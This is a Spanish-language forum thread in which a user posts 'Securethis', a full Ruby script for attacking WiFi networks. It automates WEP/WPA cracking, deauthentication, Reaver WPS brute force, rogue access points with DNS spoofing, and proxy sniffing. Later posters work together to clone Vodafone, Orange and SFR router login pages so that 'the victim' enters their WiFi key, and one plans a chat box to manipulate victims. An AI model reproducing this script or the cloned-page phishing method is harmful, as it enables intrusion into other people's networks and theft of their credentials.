Board Stats

  • stats Total de Usuarios: 23276
  • stats Total de Mensajes: 108179
  • stats Total de Temas: 10394
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: Securethis V1.0  (Leído 66553 veces)

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado 1camaron1

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 2426
  • 4 A 5 9 E 3 F 6 C 2 7
Re:Securethis V1.0
« Respuesta #50 en: Abril 17, 2013, 09:29:23 am »
Gracias ;)  el de sergio-proxy es muy interesante.
Saludos
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

> > > > >   No atiendo por privado temas que puedan tratarse en el foro   < < < <

Desconectado sylents

  • Usuario
  • *
  • Mensajes: 1
Re:Securethis V1.0
« Respuesta #51 en: Agosto 31, 2013, 02:44:35 am »
Hola la funcion rouge ap no funciona en kali linux e intentado modificar el archivo ya que creo que en kali el dhcp3 es dhcp-server.Un saludo el dnsspoof no me va tampoco.Gracias por tu ayuda.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #52 en: Agosto 31, 2013, 08:19:35 am »
Hola  ;)


El programmo esta hecho para unbutu en primero porque soy usando mucho mas unbutu que bactrack  ;)


Desconectado longyny

  • Usuario
  • *
  • Mensajes: 4
Re:Securethis V1.0
« Respuesta #53 en: Octubre 22, 2013, 20:05:17 pm »
Sigue vivo este hilo? Alguien podría resubir los archivos o recomentar algun otro script o tutorial ??

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #54 en: Octubre 22, 2013, 20:22:31 pm »
Si no esta cerrado y que puedes postear es que esta vivo  ;)
No hay descargas, copias el código y lo guardas en un fichero de texto simple que llamas Securethis.rb y ejecutas el script.

Desconectado longyny

  • Usuario
  • *
  • Mensajes: 4
Re:Securethis V1.0
« Respuesta #55 en: Octubre 22, 2013, 20:24:26 pm »
Ya, pero y las webs clonadas?

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #56 en: Octubre 22, 2013, 20:50:55 pm »
GIMP :P
pues koala se pasra por ahi un día, lo suyo si no sabes hacer fake es que subes un modelo.

Desconectado cristi_28

  • Usuario
  • *
  • Mensajes: 120
Re:Securethis V1.0
« Respuesta #57 en: Octubre 23, 2013, 02:01:33 am »
no se en lugar de webs clonadas me parece mas credible esto

http://img23..us/img23/5466/4jo3.png
Securethis V1.0

Desconectado rubenn93

  • Usuario
  • *
  • Mensajes: 61
  • RBN
Re:Securethis V1.0
« Respuesta #58 en: Octubre 23, 2013, 11:34:33 am »
el link esta caido  :-\
wpa y wpa2 --> Key Found !

Conectado fernan236

  • Usuario
  • *
  • Mensajes: 387
Re:Securethis V1.0
« Respuesta #59 en: Octubre 24, 2013, 12:21:04 pm »
ola a todos me interesa esto pero vale para wifislax 4.6 y si es asin como lo abro ahi grasias

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #60 en: Noviembre 10, 2013, 01:39:54 am »
Hola :)

No tengo mucho tiempo para hacer pahinas clonadas PERO voy a dar la spahinas que he hecho yo y a ver si uno me ayuda a terminar bien todo eso.Son pahinas para red en Francia pero hay Orange y bouygues y sfr (vodafone en espana ? )


Hay mas cosas a hacer en esas pahinas porque como no tengo mucho tiempo no estan completa, ejemplo:

-1   La ayuda en linea con una shoutbox para hablar directamente con la victima tienne necessidad de ayuda.
-2    Espaso privado con un autra pahina que pide los codigos para tener un acesso en la configuration de la box a distancia o hacer el "social engeneering" llamando la hotline para buscar mas information.
-3    Cambiar la imagen "aide.jpg" (las colores y el escrito Livebox-1234)
-4    Hacer nuevo codigo CSS mas facil y mejor para que los nuevos pueden apprender y cambiar cosas a dentro.

NO se NECESSITA usar wireshark con esas pahinas, quatro linea de PHP mas y un nuevo txt se hace cuando el usario entra su llave  wifi ;)


Ahora el link de las pahinas:

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Y el Securethis.rb que uso en unbutu 12.04LTS (no se necessita de descargar lo si tiennes una version antérior o igual que unbutu 10.04)

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} --ignore-negative-one mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} --ignore-negative-one mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} --ignore-negative-one mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque de bruteforce.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue sin internet.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Usando de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "red escondido.") { planque() }
      menu.choice(:Metasploit, "lancamiento de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "Limpiar su apache") { clean() }
      menu.choice(:Settings, "Caja de outilla.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Recuerda a todos que quieren usa el script que hay que installar las dependancias de ruby (A ver en la primera pahina de este thema)


Si algo esta de accuerdo para ayudar me a terminar las clonadas pahinas lo haré con plazer :)
Autro proyecto mas duro que tengo en la cabeza es de cambiar el functionamento del WPS en hostapd para que el cliente se connecta a nosotros in entrar la contrasena pero aqui no es lla thema.

 

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #61 en: Noviembre 10, 2013, 10:32:34 am »
Hola Koala  ;)
las tele-operadoras que puedes encontrar de "los dos lados de los pirineos" son Vodafone , Orange  y la difunta ( o sigue viva ? )  Tele2
Me parece haber visto algo acerca de numéricable que se lanzaba.
Las livebox de AGEM fueron muy utilizadas aquí y la pagina es igual que para las francesas, traduciendo el contenido.
Desgraciadamente ya no tengo de estos cacharos....

Bouygues, Free, SFR, Neuf, Darty, y Alice    no están presente en el mercado ibérico directamente.
Al contrario tendrás aquí a routers puestos en servicio por las tele-operadoras Jazztell, OnO, Telefonica a escalal nacional y tienes empresas mas "locales", implementadas en ciertas regiones, como EUSKATEL en el país vasco.
 
Los mamones de orange y vodafone están por todas parte....
A ellos si que les ha venido bien el € y el mercado común europeo; y la crisis.... no conocen...  :P

 

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #62 en: Noviembre 10, 2013, 17:27:33 pm »
De verdad que mientras estamos trabajando como dieus para tener dinero, ellos se comen hidalgo y champagne y todo eso para vender a los mas caro possible redes que hacen hacer en tunisia (para sfr o china para une parte de las livebox de orange).


Por eso hay qu hacer la resistencia !  ;)


Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23084
  • Mari
    • WirelessWindows
Re:Securethis V1.0
« Respuesta #63 en: Noviembre 10, 2013, 17:47:55 pm »
Cita de: kcdtv
y la difunta ( o sigue viva ? )  Tele2
Tele2 pertenece ahora a Vodafone

koala63 un saludo, me alegro de leerte..   ;)
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #64 en: Noviembre 10, 2013, 18:07:48 pm »
Citar
Tele2 pertenece ahora a Vodafone

Me repito, estos mamones estan  por todas parte ...  :P 

en Espana la pagina de administración vodafone tiene esta pinta ahorita

http://i.imm.io/1kkJe.png
Securethis V1.0


es gracioso lo de "configuración de " seguridad optima" teniendo el WPS activado por defecto  :P
« Última modificación: Noviembre 10, 2013, 18:09:40 pm por kcdtv »

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #65 en: Noviembre 10, 2013, 19:19:19 pm »
mmh se puede hacer rapido eso con un poco de css

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #66 en: Noviembre 10, 2013, 19:41:43 pm »
si quieres los códigos fuentes de las paginas o algo, solo preguntas...

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #67 en: Noviembre 10, 2013, 19:56:47 pm »
Si, envia me el vodafone por favor ;)

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #68 en: Noviembre 10, 2013, 20:26:16 pm »
esto es el codigo fuente de la primera pagina

Código: [Seleccionar]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Inicio</title>
<link rel="stylesheet" type="text/css" title="Style" href="../css/main.css" />
<script type="text/javascript" src="../js/main.js"></script>
<script type="text/javascript" src="../js/utils.js"></script>
<script type="text/javascript" src="../js/menu.js"></script>
<script type="text/javascript">if(window.navigator.userAgent.indexOf("MSIE")>=1){document.execCommand("BackgroundImageCache", false, true);}</script>
</head>
<body id="top">
<div id="global">
<div id="header">
<div class="logo">
<div class="logo_home"><a href="index.htm" ><img src="../img/header/logo.gif" border="0" alt="home" /></a></div>
<div class="language"><strong><a href="../en_US/index.htm" id = "langlink" onclick = "changelang(0, 0);">English</a> | Español</strong></div>
</div>
</div>
<div id="container">
<div id="nav">
<script type="text/javascript">ImportMenu_es('');</script>
</div>

<div id="content" class="home">
<div class="content_bl">
<div class="content_tl">
<div class="content_tr">
<div class="content_cnr">
<div class="content_main">
<div class="intro">
<p class="intro">Bienvenido la <span class="title">interfaz de configuración</span></p>
<p>El Equipo está configurado para proporcionar un rendimiento y una seguridad óptimos.<br />También puede conectar al Equipo diversos accesorios, que se podrán compartir entre<br />varios ordenadores y tendrán acceso a Internet.
</p>
</div>
  <table class="line std_Vmargin">
<tr>
<td class="txt_l">
<div class="box size_Home_1on3" style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd box_item" ><span>Equipo</span></h3>
<div class="box_main">
<img src="../img/pictures/home_configurationbox.jpg" alt="Box configuration " />
<ul class="link_list">
<li><a href="statut_services.html">Estado del servicio: comprobar el estado de los servicios (conexión a Internet, WiFi, telefonía fija )</a></li>
<li><a href="config_appli.html">Aplicaciones: autorizar a mis juegos y aplicaciones para que funcionen en la  red</a></li>
<script type="text/javascript">
<!--
var pwdLevel = '<%ejGet(userLevel)%>';
if ( pwdLevel != '1' )
{
document.writeln('<li><a href="config_wifi.html">WiFi: administrar mi conexión inalámbrica </a></li>');
}
-->
</script>
<li class="last"><a href="config_routeur_expert.htm">Router: administrar parámetros avanzados del Equipo </a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
<td class="txt_c">
<div class="box size_Home_1on3 middle"  style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd homenetwork_item"><span>Red local</span></h3>
<div class="box_main">
<img src="../img/pictures/home_accessoiresbox.jpg" alt="Home Network" />
<ul class="link_list">
<li><a href="equipements_raccordes.html">Dispositivos conectados: ver los dispositivos conectados al Equipo</a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
<td class="txt_r">
<div class="box size_Home_1on3 floatr"  style="background:none; border:1px solid #CCCCCC;">
<div class=""><div class=""><div class=""><div class="">
<h3 class="box_hd support_item" ><span>Soporte técnico</span></h3>
<div class="box_main">
<img src="../img/pictures/home_assistance.jpg" alt="Support" />
<ul class="link_list">
<li><a href="diagnostic.html">Solución de problemas: acceso a la solución de problemas relacionados con el equipo de manera integral.</a></li>
</ul>
</div>
</div></div></div></div>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="clearing"></div>
</div>
</div>
</body>
</html>

Tal cual cuando hago "view page source" con el iceweasel


tienes estos elementos graficos
http://i.imm.io/1klrC.png
Securethis V1.0


te los he puesto en este fichero >
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
algunos son blancos, los fondos, no sabia si te hacia falta para historias de dimensiones

quieres algo mas?
 

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #69 en: Noviembre 10, 2013, 22:11:45 pm »
Muchas gracias :) ya me vale con eso  8)

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #70 en: Noviembre 10, 2013, 23:54:25 pm »
Gracias a ti maestro  ;)

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #71 en: Noviembre 11, 2013, 20:23:15 pm »
Hola :)

@Kcdtv, un amigo a podido dar me por la semana una Livebox y una Bbox, he podido hacer un "dump" de las paginas de configuracion y soy rehaciendo todas las paginas finalemente  ;)


Si puedes hacer un dump de vodafone para mi (los CSS y JS del codigo de la pagina wifi), ya te haré una muy bonita pagina  :P si no puedes, no problemo me arerglaré con lo que tengo :)

He hecho Livebox y Sfr hoy y voy a intentar de poner una shoutbox para la ayuda a la victima en todas la paginas clonadas.

Desconectado ñanduti

  • Usuario
  • *
  • Mensajes: 258
Re:Securethis V1.0
« Respuesta #72 en: Noviembre 11, 2013, 20:58:28 pm »
este script no rula en kali y en wifislax ??? solo en ubuntu no ::) un salu2
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #73 en: Noviembre 11, 2013, 21:44:01 pm »
En kali debería funcionar ya que es debian based como ubuntu.
Citar
Si puedes hacer un dump de vodafone para mi (los CSS y JS del codigo de la pagina wifi)
Entendido, te mirare esto   ;)

Citar
He hecho Livebox y Sfr hoy y voy a intentar de poner una shoutbox para la ayuda a la victima en todas la paginas clonadas.

ahi te veo puliendo los detalles  ;)

Desconectado ñanduti

  • Usuario
  • *
  • Mensajes: 258
Re:Securethis V1.0
« Respuesta #74 en: Noviembre 11, 2013, 22:12:51 pm »
copio el scrip en un portapapeles le doy permisos y cual  seria el comando correcto en kali seria asi no  bash ruby Securethis.rb.sh  un salu2
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.